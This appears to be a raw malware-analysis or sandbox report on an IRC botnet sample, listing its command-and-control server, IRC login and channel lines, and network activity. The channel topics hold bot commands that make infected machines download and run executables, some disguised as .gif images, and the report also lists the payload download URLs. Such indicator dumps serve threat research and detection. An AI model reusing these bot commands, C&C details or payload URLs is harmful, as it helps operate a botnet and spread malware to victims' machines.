Remote Host Port Number
 70.38.98.239 80
 92.243.24.240 5900
 PASS Virus
NICK VirUs-sgvyxgjf
 USER VirUs “” “dah” :
 8Coded
 8VirUs..
 JOIN #THeRaNdOm4# Virus
 PRIVMSG #THeRaNdOm4# :Success.
 PONG :OGARD.EDUCATIONAL.Gov
 Now talking in #THeRaNdOm4#
 Topic On: [ #THeRaNdOm4#  12] [ !NAZELlol http://img105.herosh.com/2010/11/11/555028723.gif Hajni12.exe 1 ]
 Topic By: [ Somebody ]
tux.shannen.cc  92.243.24.240 
 0  127.0.0.1 
 fastwebinfo.com 
 fastwebinfo.com  66.96.217.24 
 promoup.info 
 promoup.info  194.8.251.2 
 img104.herosh.com 
 img104.herosh.com  70.38.98.238 
 UDP Connections 
 Remote IP Address: 127.0.0.1 Port: 1111
 Send Datagram: 142 packet(s) of size 1
 Recv Datagram: 142 packet(s) of size 1
 Download URLs 
 http://66.96.217.24/install.48691.exe (fastwebinfo.com) 
 http://194.8.251.2/setup585.exe (promoup.info) 
 http://70.38.98.238/2010/11/11/256450241.gif (img104.herosh.com)
C&C Server: 92.243.24.240:33333 
 Server Password: 
 Username: VirUs 
 Nickname: {NOVA}[DEU][XP-SP3]971879 
 Channel: ##Turb0-36## (Password: ) 
 Channeltopic: :!NAZELturbo http://fastwebinfo.com/install.48691.exe dw79hm625.exe | !NAZELturbo http://promoup.info/setup585.exe oko3.exe | !NAZELturbo http://img104.herosh.com/2010/11/11/256450241.gif pat1.exe 
 Outgoing connection to remote server: fastwebinfo.com TCP port 80
 Outgoing connection to remote server: promoup.info TCP port 80
 Outgoing connection to remote server: img104.herosh.com TCP port 80
 DNS Lookup 
 Host Name  IP Address 
 paypal.com  64.4.241.61 
 aol.com  207.200.74.38
 * The data identified by the following URL was then requested from the remote web server:
 o http://img105.herosh.com/2010/11/11/555028723.gif
Hosting info:
 http://whois.domaintools.com/92.243.24.240